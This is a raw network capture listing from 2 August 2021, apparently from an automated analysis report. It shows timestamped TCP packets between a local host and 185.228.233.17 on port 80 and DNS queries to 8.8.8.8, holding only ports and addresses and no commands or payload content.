Aug 2, 2021 22:06:43.693166018 CEST	49745	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:43.699403048 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.699455976 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.699502945 CEST	49745	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:43.701612949 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.701703072 CEST	49745	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:43.701725960 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.702881098 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.702956915 CEST	49745	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:43.704102993 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.705385923 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.705478907 CEST	49745	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:43.706531048 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.707705975 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.707782030 CEST	49745	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:43.708946943 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.710097075 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.710182905 CEST	49745	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:43.711455107 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.712598085 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.712647915 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.712687969 CEST	49745	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:43.713903904 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.713972092 CEST	49745	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:43.714992046 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.716310978 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.716432095 CEST	49745	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:43.751204014 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.751271963 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.751312971 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.751349926 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.751379013 CEST	49745	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:43.751388073 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.751425028 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.751432896 CEST	49745	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:43.751462936 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.751475096 CEST	49745	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:43.751501083 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.751547098 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.751586914 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.751595974 CEST	49745	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:43.751624107 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.751641035 CEST	49745	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:43.751703978 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.751770973 CEST	49745	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:43.751868010 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.753066063 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.753150940 CEST	49745	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:43.754380941 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.754422903 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.754504919 CEST	49745	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:43.756927013 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.756968975 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.757041931 CEST	49745	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:43.759248972 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.782088995 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.782134056 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.782192945 CEST	49745	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:43.785404921 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.785507917 CEST	49745	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:43.785571098 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.788208961 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.788274050 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.788279057 CEST	49745	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:43.790402889 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.790442944 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.790492058 CEST	49745	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:43.793261051 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.793289900 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.793364048 CEST	49745	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:43.794173956 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.794199944 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.794253111 CEST	49745	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:43.796586037 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.796611071 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.796706915 CEST	49745	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:43.797733068 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.797847033 CEST	49745	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:43.799140930 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.800333023 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.800504923 CEST	49745	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:43.801629066 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.809825897 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.809976101 CEST	49745	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:43.823163033 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.823319912 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.823443890 CEST	49745	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:43.826651096 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.826703072 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.826782942 CEST	49745	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:43.829421043 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.829459906 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.829533100 CEST	49745	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:43.831726074 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.831765890 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.831850052 CEST	49745	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:43.834403038 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.834542990 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.834661961 CEST	49745	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:43.835473061 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.836772919 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.836875916 CEST	49745	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:43.839010000 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.839054108 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.839170933 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.839237928 CEST	49745	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:43.840322018 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.840473890 CEST	49745	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:43.841686964 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.841757059 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.841849089 CEST	49745	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:43.843699932 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.864223003 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.864279985 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.864356041 CEST	49745	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:43.867683887 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.867785931 CEST	49745	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:43.867837906 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.868817091 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.868874073 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.868902922 CEST	49745	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:43.871298075 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.871351957 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.871377945 CEST	49745	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:43.871409893 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.871596098 CEST	49745	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:43.873781919 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.874989033 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.875094891 CEST	49745	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:43.876265049 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.877481937 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.877635002 CEST	49745	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:43.878590107 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.879842997 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.879951954 CEST	49745	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:43.880999088 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.881042957 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.882186890 CEST	49745	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:43.883356094 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.883414030 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.883518934 CEST	49745	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:43.884726048 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.885809898 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.885970116 CEST	49745	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:43.905641079 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.905670881 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.905803919 CEST	49745	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:43.909045935 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.909162045 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.909262896 CEST	49745	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:43.910173893 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.911581039 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.911672115 CEST	49745	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:43.912724018 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.912759066 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.912852049 CEST	49745	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:43.916323900 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.916363001 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.916484118 CEST	49745	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:43.918762922 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.918814898 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.918914080 CEST	49745	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:43.921144009 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.921195984 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.921236038 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.921309948 CEST	49745	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:43.922504902 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.922607899 CEST	49745	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:43.923613071 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.923664093 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.923755884 CEST	49745	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:43.925806046 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.925939083 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.926023006 CEST	49745	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:43.926048994 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.927194118 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.927288055 CEST	49745	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:43.927299023 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.929379940 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.929460049 CEST	49745	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:43.947231054 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.947263002 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.947360039 CEST	49745	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:43.950572014 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.950603008 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.950722933 CEST	49745	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:43.952819109 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.952989101 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.953063011 CEST	49745	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:43.954530954 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.954555988 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.954648018 CEST	49745	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:43.957710981 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.957742929 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.957833052 CEST	49745	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:43.959928036 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.960098982 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.960186958 CEST	49745	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:43.962610006 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.962637901 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.962655067 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.962805986 CEST	49745	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:43.963974953 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.964087009 CEST	49745	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:43.964994907 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.965010881 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.965146065 CEST	49745	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:43.967283010 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.967294931 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.967366934 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.967432976 CEST	49745	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:43.969667912 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.969755888 CEST	49745	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:43.988372087 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.988405943 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.988509893 CEST	49745	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:43.989387989 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.989418030 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.989474058 CEST	49745	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:43.991926908 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.991949081 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.991998911 CEST	49745	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:43.994371891 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.995445013 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.996649027 CEST	49745	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:43.996730089 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.997932911 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.998023033 CEST	49745	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:43.998999119 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:44.000304937 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:44.000392914 CEST	49745	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:44.001614094 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:44.001655102 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:44.001688004 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:44.001754045 CEST	49745	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:44.001873970 CEST	49745	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:44.059922934 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:44.340734959 CEST	49746	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:44.398883104 CEST	80	49746	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:44.399142981 CEST	49746	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:44.399979115 CEST	49746	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:44.501995087 CEST	80	49746	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:44.934506893 CEST	80	49746	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:44.935604095 CEST	80	49746	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:44.935827971 CEST	49746	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:44.936026096 CEST	49746	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:44.936228991 CEST	80	49746	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:44.936409950 CEST	49746	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:44.993777990 CEST	80	49746	185.228.233.17	192.168.2.3
Aug 2, 2021 22:07:15.599577904 CEST	49747	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:07:15.657552958 CEST	80	49747	185.228.233.17	192.168.2.3
Aug 2, 2021 22:07:15.657819033 CEST	49747	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:07:15.658662081 CEST	49747	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:07:15.757863045 CEST	80	49747	185.228.233.17	192.168.2.3
Aug 2, 2021 22:07:16.188829899 CEST	80	49747	185.228.233.17	192.168.2.3
Aug 2, 2021 22:07:16.188873053 CEST	80	49747	185.228.233.17	192.168.2.3
Aug 2, 2021 22:07:16.188946009 CEST	49747	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:07:16.189127922 CEST	49747	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:07:16.246965885 CEST	80	49747	185.228.233.17	192.168.2.3
Aug 2, 2021 22:07:16.504410028 CEST	49748	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:07:16.566930056 CEST	80	49748	185.228.233.17	192.168.2.3
Aug 2, 2021 22:07:16.567096949 CEST	49748	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:07:16.567487955 CEST	49748	80	192.168.2.3	185.228.233.17

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 2, 2021 22:02:49.268071890 CEST	64938	53	192.168.2.3	8.8.8.8
Aug 2, 2021 22:02:49.292954922 CEST	53	64938	8.8.8.8	192.168.2.3
Aug 2, 2021 22:02:49.721112967 CEST	60152	53	192.168.2.3	8.8.8.8
Aug 2, 2021 22:02:49.755067110 CEST	53	60152	8.8.8.8	192.168.2.3
Aug 2, 2021 22:02:50.064934969 CEST	57544	53	192.168.2.3	8.8.8.8
Aug 2, 2021 22:02:50.100239992 CEST	53	57544	8.8.8.8	192.168.2.3
Aug 2, 2021 22:02:51.521497965 CEST	55984	53	192.168.2.3	8.8.8.8
Aug 2, 2021 22:02:51.546134949 CEST	53	55984	8.8.8.8	192.168.2.3
Aug 2, 2021 22:02:52.580053091 CEST	64185	53	192.168.2.3	8.8.8.8
Aug 2, 2021 22:02:52.605803967 CEST	53	64185	8.8.8.8	192.168.2.3
Aug 2, 2021 22:02:53.928184986 CEST	65110	53	192.168.2.3	8.8.8.8
Aug 2, 2021 22:02:53.952991962 CEST	53	65110	8.8.8.8	192.168.2.3
Aug 2, 2021 22:02:54.875457048 CEST	58361	53	192.168.2.3	8.8.8.8
Aug 2, 2021 22:02:54.907730103 CEST	53	58361	8.8.8.8	192.168.2.3
Aug 2, 2021 22:02:57.002964020 CEST	63492	53	192.168.2.3	8.8.8.8
Aug 2, 2021 22:02:57.029074907 CEST	53	63492	8.8.8.8	192.168.2.3
Aug 2, 2021 22:02:58.020632982 CEST	60831	53	192.168.2.3	8.8.8.8
Aug 2, 2021 22:02:58.075920105 CEST	53	60831	8.8.8.8	192.168.2.3
Aug 2, 2021 22:02:58.909636021 CEST	60100	53	192.168.2.3	8.8.8.8
Aug 2, 2021 22:02:58.934804916 CEST	53	60100	8.8.8.8	192.168.2.3
Aug 2, 2021 22:02:59.959527969 CEST	53195	53	192.168.2.3	8.8.8.8
Aug 2, 2021 22:02:59.984487057 CEST	53	53195	8.8.8.8	192.168.2.3
Aug 2, 2021 22:03:00.747438908 CEST	50141	53	192.168.2.3	8.8.8.8
Aug 2, 2021 22:03:00.774991989 CEST	53	50141	8.8.8.8	192.168.2.3
Aug 2, 2021 22:03:01.779618979 CEST	53023	53	192.168.2.3	8.8.8.8
Aug 2, 2021 22:03:01.814856052 CEST	53	53023	8.8.8.8	192.168.2.3
Aug 2, 2021 22:03:02.832464933 CEST	49563	53	192.168.2.3	8.8.8.8
Aug 2, 2021 22:03:02.859850883 CEST	53	49563	8.8.8.8	192.168.2.3
Aug 2, 2021 22:03:05.295383930 CEST	51352	53	192.168.2.3	8.8.8.8
Aug 2, 2021 22:03:05.322897911 CEST	53	51352	8.8.8.8	192.168.2.3
Aug 2, 2021 22:03:06.081554890 CEST	59349	53	192.168.2.3	8.8.8.8
Aug 2, 2021 22:03:06.107681990 CEST	53	59349	8.8.8.8	192.168.2.3
Aug 2, 2021 22:03:07.152578115 CEST	57084	53	192.168.2.3	8.8.8.8
Aug 2, 2021 22:03:07.185472012 CEST	53	57084	8.8.8.8	192.168.2.3
Aug 2, 2021 22:03:23.688122034 CEST	58823	53	192.168.2.3	8.8.8.8
Aug 2, 2021 22:03:23.732780933 CEST	53	58823	8.8.8.8	192.168.2.3
Aug 2, 2021 22:03:25.145255089 CEST	57568	53	192.168.2.3	8.8.8.8
Aug 2, 2021 22:03:25.183161020 CEST	53	57568	8.8.8.8	192.168.2.3
Aug 2, 2021 22:03:40.807431936 CEST	50540	53	192.168.2.3	8.8.8.8
Aug 2, 2021 22:03:40.858275890 CEST	53	50540	8.8.8.8	192.168.2.3
Aug 2, 2021 22:03:42.654934883 CEST	54366	53	192.168.2.3	8.8.8.8
Aug 2, 2021 22:03:42.688668966 CEST	53	54366	8.8.8.8	192.168.2.3
Aug 2, 2021 22:03:57.858155966 CEST	53034	53	192.168.2.3	8.8.8.8
Aug 2, 2021 22:03:57.899148941 CEST	53	53034	8.8.8.8	192.168.2.3
Aug 2, 2021 22:04:00.330265045 CEST	57762	53	192.168.2.3	8.8.8.8
Aug 2, 2021 22:04:00.367273092 CEST	53	57762	8.8.8.8	192.168.2.3
Aug 2, 2021 22:04:33.279483080 CEST	55435	53	192.168.2.3	8.8.8.8
Aug 2, 2021 22:04:33.315016985 CEST	53	55435	8.8.8.8	192.168.2.3
Aug 2, 2021 22:04:37.726408005 CEST	50713	53	192.168.2.3	8.8.8.8
Aug 2, 2021 22:04:37.774669886 CEST	53	50713	8.8.8.8	192.168.2.3
Aug 2, 2021 22:05:46.569678068 CEST	56132	53	192.168.2.3	8.8.8.8
Aug 2, 2021 22:05:46.637603998 CEST	53	56132	8.8.8.8	192.168.2.3
Aug 2, 2021 22:05:47.149491072 CEST	58987	53	192.168.2.3	8.8.8.8
Aug 2, 2021 22:05:47.182049990 CEST	53	58987	8.8.8.8	192.168.2.3
Aug 2, 2021 22:05:47.793664932 CEST	56579	53	192.168.2.3	8.8.8.8
Aug 2, 2021 22:05:47.826215982 CEST	53	56579	8.8.8.8	192.168.2.3
Aug 2, 2021 22:05:48.327167034 CEST	60633	53	192.168.2.3	8.8.8.8
Aug 2, 2021 22:05:48.381638050 CEST	53	60633	8.8.8.8	192.168.2.3
Aug 2, 2021 22:05:48.981853008 CEST	61292	53	192.168.2.3	8.8.8.8
Aug 2, 2021 22:05:49.014811039 CEST	53	61292	8.8.8.8	192.168.2.3
Aug 2, 2021 22:05:49.771969080 CEST	63619	53	192.168.2.3	8.8.8.8
Aug 2, 2021 22:05:49.807537079 CEST	53	63619	8.8.8.8	192.168.2.3
Aug 2, 2021 22:05:50.400219917 CEST	64938	53	192.168.2.3	8.8.8.8
Aug 2, 2021 22:05:50.433187008 CEST	53	64938	8.8.8.8	192.168.2.3
Aug 2, 2021 22:05:51.236865997 CEST	61946	53	192.168.2.3	8.8.8.8
Aug 2, 2021 22:05:51.270351887 CEST	53	61946	8.8.8.8	192.168.2.3
Aug 2, 2021 22:05:51.961168051 CEST	64910	53	192.168.2.3	8.8.8.8
Aug 2, 2021 22:05:51.986313105 CEST	53	64910	8.8.8.8	192.168.2.3
Aug 2, 2021 22:05:52.410029888 CEST	52123	53	192.168.2.3	8.8.8.8
